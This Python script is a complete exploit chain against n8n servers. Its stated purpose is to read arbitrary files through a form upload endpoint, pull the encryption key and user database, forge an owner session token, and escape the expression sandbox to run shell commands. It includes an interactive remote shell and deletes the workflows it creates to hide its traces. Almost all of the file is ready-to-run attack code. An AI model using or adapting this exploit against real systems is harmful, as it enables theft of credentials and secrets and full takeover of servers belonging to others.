#!/usr/bin/env python3 """ CVE-2026-21858 + CVE-2025-68613 - n8n Full Chain Exploit Arbitrary File Read → Admin Token Forge → Sandbox Bypass → RCE Author: Chocapikk GitHub: https://github.com/Chocapikk/CVE-2026-21858 """ import argparse import hashlib import json import secrets import sqlite3 import string import tempfile from base64 import b64encode import jwt import requests from pwn import log BANNER = """ ╔═══════════════════════════════════════════════════════════════╗ ║ CVE-2026-21858 + CVE-2025-68613 - n8n Full Chain ║ ║ Arbitrary File Read → Token Forge → Sandbox Bypass → RCE ║ ║ ║ ║ by Chocapikk ║ ╚═══════════════════════════════════════════════════════════════╝ """ RCE_PAYLOAD = '={{ (function() { var require = this.process.mainModule.require; var execSync = require("child_process").execSync; return execSync("CMD").toString(); })() }}' def randstr(n: int = 12) -> str: return "".join(secrets.choice(string.ascii_lowercase + string.digits) for _ in range(n)) def randpos() -> list[int]: return [secrets.randbelow(500) + 100, secrets.randbelow(500) + 100] class Ni8mare: def __init__(self, base_url: str, form_path: str): self.base_url = base_url.rstrip("/") self.form_url = f"{self.base_url}/{form_path.lstrip('/')}" self.session = requests.Session() self.admin_token = None def _api(self, method: str, path: str, **kwargs) -> requests.Response | None: kwargs.setdefault("timeout", 30) kwargs.setdefault("cookies", {"n8n-auth": self.admin_token} if self.admin_token else {}) resp = self.session.request(method, f"{self.base_url}{path}", **kwargs) return resp if resp.ok else None def _lfi_payload(self, filepath: str) -> dict: return { "data": {}, "files": { f"f-{randstr(6)}": { "filepath": filepath, "originalFilename": f"{randstr(8)}.bin", "mimetype": "application/octet-stream", "size": secrets.randbelow(90000) + 10000 } } } def _build_nodes(self, command: str) -> tuple[list, dict, str, str]: trigger_name, rce_name = f"T-{randstr(8)}", f"R-{randstr(8)}" result_var = f"v{randstr(6)}" payload_value = RCE_PAYLOAD.replace("CMD", command.replace('"', '\\"')) nodes = [ {"parameters": {}, "name": trigger_name, "type": "n8n-nodes-base.manualTrigger", "typeVersion": 1, "position": randpos(), "id": f"t-{randstr(12)}"}, {"parameters": {"values": {"string": [{"name": result_var, "value": payload_value}]}}, "name": rce_name, "type": "n8n-nodes-base.set", "typeVersion": 2, "position": randpos(), "id": f"r-{randstr(12)}"} ] connections = {trigger_name: {"main": [[{"node": rce_name, "type": "main", "index": 0}]]}} return nodes, connections, trigger_name, rce_name # ========== Arbitrary File Read (CVE-2026-21858) ========== def read_file(self, filepath: str, timeout: int = 30) -> bytes | None: resp = self.session.post( self.form_url, json=self._lfi_payload(filepath), headers={"Content-Type": "application/json"}, timeout=timeout ) return resp.content if resp.ok and resp.content else None def get_version(self) -> tuple[str, bool]: resp = self._api("GET", "/rest/settings", timeout=10) version = resp.json().get("data", {}).get("versionCli", "0.0.0") if resp else "0.0.0" major, minor = map(int, version.split(".")[:2]) return version, major < 1 or (major == 1 and minor < 121) def get_home(self) -> str | None: data = self.read_file("/proc/self/environ") if not data: return None for var in data.split(b"\x00"): if var.startswith(b"HOME="): return var.decode().split("=", 1)[1] return None def get_key(self, home: str) -> str | None: data = self.read_file(f"{home}/.n8n/config") return json.loads(data).get("encryptionKey") if data else None def get_db(self, home: str) -> bytes | None: return self.read_file(f"{home}/.n8n/database.sqlite", timeout=120) def extract_admin(self, db: bytes) -> tuple[str, str, str] | None: with tempfile.NamedTemporaryFile(suffix=".db") as f: f.write(db) f.flush() conn = sqlite3.connect(f.name) row = conn.execute("SELECT id, email, password FROM user WHERE role='global:owner' LIMIT 1").fetchone() conn.close() return (row[0], row[1], row[2]) if row else None def forge_token(self, key: str, uid: str, email: str, pw_hash: str) -> str: secret = hashlib.sha256(key[::2].encode()).hexdigest() h = b64encode(hashlib.sha256(f"{email}:{pw_hash}".encode()).digest()).decode()[:10] self.admin_token = jwt.encode({"id": uid, "hash": h}, secret, "HS256") return self.admin_token def verify_token(self) -> bool: return self._api("GET", "/rest/users", timeout=10) is not None # ========== RCE (CVE-2025-68613) ========== def rce(self, command: str) -> str | None: nodes, connections, _, _ = self._build_nodes(command) wf_name = f"wf-{randstr(16)}" workflow = {"name": wf_name, "active": False, "nodes": nodes, "connections": connections, "settings": {}} resp = self._api("POST", "/rest/workflows", json=workflow, timeout=10) if not resp: return None wf_id = resp.json().get("data", {}).get("id") if not wf_id: return None run_data = {"workflowData": {"id": wf_id, "name": wf_name, "active": False, "nodes": nodes, "connections": connections, "settings": {}}} resp = self._api("POST", f"/rest/workflows/{wf_id}/run", json=run_data, timeout=30) if not resp: self._api("DELETE", f"/rest/workflows/{wf_id}", timeout=5) return None exec_id = resp.json().get("data", {}).get("executionId") result = self._get_result(exec_id) if exec_id else None self._api("DELETE", f"/rest/workflows/{wf_id}", timeout=5) return result def _get_result(self, exec_id: str) -> str | None: resp = self._api("GET", f"/rest/executions/{exec_id}", timeout=10) if not resp: return None data = resp.json().get("data", {}).get("data") if not data: return None parsed = json.loads(data) # Result is usually the last non-empty string for item in reversed(parsed): if isinstance(item, str) and len(item) > 3 and item not in ("success", "error"): return item.strip() return None # ========== Full Chain ========== def pwn(self) -> bool: p = log.progress("HOME directory") home = self.get_home() if not home: return p.failure("Not found") or False p.success(home) p = log.progress("Encryption key") key = self.get_key(home) if not key: return p.failure("Failed") or False p.success(f"{key[:8]}...") p = log.progress("Database") db = self.get_db(home) if not db: return p.failure("Failed") or False p.success(f"{len(db)} bytes") p = log.progress("Admin user") admin = self.extract_admin(db) if not admin: return p.failure("Not found") or False uid, email, pw = admin p.success(email) p = log.progress("Token forge") self.forge_token(key, uid, email, pw) p.success("OK") p = log.progress("Admin access") if not self.verify_token(): return p.failure("Rejected") or False p.success("GRANTED!") log.success(f"Cookie: n8n-auth={self.admin_token}") return True def parse_args(): p = argparse.ArgumentParser(description="n8n Ni8mare - Full Chain Exploit") p.add_argument("url", help="Target URL (http://target:5678)") p.add_argument("form", help="Form path (/form/upload)") p.add_argument("--read", metavar="PATH", help="Read arbitrary file") p.add_argument("--cmd", metavar="CMD", help="Execute single command") p.add_argument("-o", "--output", metavar="FILE", help="Save LFI output to file") return p.parse_args() def run_read(exploit: Ni8mare, path: str, output: str | None) -> None: data = exploit.read_file(path) if not data: log.error("File read failed") return log.success(f"{len(data)} bytes") if output: with open(output, "wb") as f: f.write(data) log.success(f"Saved: {output}") return print(data.decode()) def run_cmd(exploit: Ni8mare, cmd: str) -> None: p = log.progress("RCE") out = exploit.rce(cmd) if not out: p.failure("Failed") return p.success("OK") print(f"\n{out}") def run_shell(exploit: Ni8mare) -> None: log.info("Interactive mode (type 'exit' to quit)") while True: try: cmd = input("\033[91mn8n\033[0m> ").strip() except (EOFError, KeyboardInterrupt): print() return if not cmd or cmd == "exit": return out = exploit.rce(cmd) if out: print(out) def main(): print(BANNER) args = parse_args() exploit = Ni8mare(args.url, args.form) version, vuln = exploit.get_version() log.info(f"Target: {exploit.form_url}") log.info(f"Version: {version} ({'VULN' if vuln else 'SAFE'})") if args.read: run_read(exploit, args.read, args.output) return if not exploit.pwn(): return if args.cmd: run_cmd(exploit, args.cmd) return run_shell(exploit) if __name__ == "__main__": main()